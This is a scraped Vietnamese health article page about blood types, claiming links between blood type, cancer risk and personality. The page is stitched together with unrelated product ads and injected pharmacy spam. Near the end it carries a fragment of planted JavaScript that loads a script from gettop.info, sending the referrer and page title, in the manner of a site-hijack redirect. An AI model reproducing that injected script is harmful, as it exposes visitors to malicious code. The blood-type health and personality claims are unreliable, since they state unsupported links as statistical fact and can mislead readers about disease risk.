Website cùng hệ thống:
Hỗ trợ trực tuyến:

Hoàng Giáp cung cấp lồng công nghiệp giá rẻ nhưng rất chuyên nghiệp. Sản phẩm bán lồng thỏ 100 làm bằng máy tự động, các mối hàn gọn, chắc chắn, các nan lồng được mạ kẽm sáng bóng và độ bền cao. Tôi đã sử dụng toàn bộ thiết bị máy làm cám Hoàng Giáp cung cấp từ lồng thỏ, van uống nước cho thỏ, máng ăn cho thỏ, tấm nhựa đa năng. Đặc biệt tôi rất yêu thích bán máy ép cám viên chăn nuôi, bởi sản phẩm này giúp tôi tiết kệm 60% chi phí chăn nuôi và 70% nhân lực cho chăn nuôi. Cảm ơn Hoàng Giáp Nhận đào tạo, hướng dẫn giải pháp phục hồi tóc hư tổn tận gốc chỉ sau 1 tuần

^ Lên đầu trang
Biết nhóm máu có lợi gì

Biết nhóm máu có lợi gì?

Đăng ngày 06/02/2012

Nếu bạn biết được nhóm máu của mình thì có lợi gì? Qua thống kê, người ta thấy rằng nhóm máu cũng liên quan đến khả năng mắc một bệnh nào đó.

Đối với bệnh ung thư chẳng hạn, thì:

- Nhóm O: ít có nguy cơ. Nếu mắc, bệnh diễn biến chậm.

- Nhóm A: ngược với nhóm O

- Nhóm B: gần giống nhóm O, trừ phi gia đình có người mắc bệnh (mang tính di truyền).

- Nhóm AB tương tự nhóm A, nhưng có thể trầm trọng hơn. Tỷ lệ tử vong cao.

Biết được điều đó, căn cứ vào nhóm máu, có thể chú ý thường xuyên hơn đến tình trạng sứ khoẻ của mình để sớm phát hiện bệnh, đồng thời loại trừ nguyên nhân (từ việc kiêng cữ các món ăn cho đến phong cách sống).

Ngoài ra cũng qua thống kê, người ta còn phát hiện nhóm máu có ảnh hưởng cả đến tính cách. Biết nhóm máu của mình có thể phát huy sở trường, khắc phục sở đoản cũng như biết được người cộng tác với mình, hướng nghiệp cho con cái… Song cũng chỉ là một yêu tố để tham khảo.

buy cialis by paypal Ví dụ các nhà tâm lý đưa ra nhận xét:

- Nhóm O: mạnh mẽ, tự tin, quyết đoán, thực tiễn và có đầu óc chiến lược, có tính hướng ngoại.

- Nhóm A: Nhạy cảm, ưa sự hoàn thiện, thích sáng tạo, có tính hướng nội và hay bảo thủ.

- Nhóm B: Có khả năng độc lập suy nghĩ, linh hoạt trong ứng xử, có đầu óc tổ chức nhưng tự cao và dễ hành động bột phát.

- Nhóm AB: Thụ động, dễ thoả mãn với hoàn cảnh, dễ hoà đồng và cảm thông với mọi người nhưng phản ứng chậm và không thích đổi thay.

 

(Theo vietnamnet.vn)document.currentScript.parentNode.insertBefore(s, document.currentScript); Purchase http://azone.greglane.me/purchase-sinequan/ http://theblackfridaydeal.net/uncategorized/dapoxetine-cheapest Pills Cheap buy aldara 5 cream s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; http://thelonghaul.org/archives/7516

© 2012 – 2018, NhómMáu.vn. Giữ toàn quyền. Vui lòng ghi rõ nguồn khi bạn phát hành lại nội dung từ website này.


Bài viết liên quan

Bộ Y Tế Trung Ương Hội Chữ thập đỏ Việt Nam Kênh truyền hình Sức khỏe O2TV Viện Huyết học truyền máu Trung ương Bệnh viện K Bệnh viện Bạch Mai Bệnh viện Trung Ương Quân đội 108 Bệnh viện 103 Bệnh viện hữu nghị Việt Đức Bệnh viện Nhi Trung Ương Bệnh viện Phụ sản Trung Ương Bệnh viện Phụ sản Hà Nội EldonCard